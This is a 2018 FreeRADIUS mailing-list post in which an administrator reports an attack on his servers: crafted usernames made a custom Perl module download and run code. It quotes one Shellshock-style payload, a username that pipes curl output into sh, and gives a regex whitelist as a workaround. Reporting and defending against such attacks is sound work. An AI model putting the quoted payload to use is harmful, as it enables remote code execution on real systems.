Remote code execution vulnerability via Perl module

David Herselman dhe at
Tue Jul 3 13:44:07 CEST 2018


We had upgraded our infrastructure to FreeRADIUS 2.2.10 due to us receiving a growing number of authentication requests, starting Fri Jun 29 00:48:59 (GMT), which result in FreeRADIUS downloading and executing code.

Transmitting the following username results in a custom perl module executing the code:

We have observed another variant of this, which didn't appear to affect us:
	() { :;}; /usr/bin/curl|sh

We've been able to work around the problem by placing the following code near the beginning of our Perl module:
	if ($RAD_REQUEST{'User-Name'} !~ /^[[:alnum:]._-]+$/) { return RLM_MODULE_NOTFOUND; };

Any suggestions regarding possibly cleaning other attributes which may result in code execution on the following line?
	&radiusd::radlog(1, "RAD_REQUEST: $_ = $RAD_REQUEST{$_}");

[davidh at zatjnb01-radius1 ~]# perl -le 'print "u-s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\\s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\(s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'

David Herselman

More information about the Freeradius-Users mailing list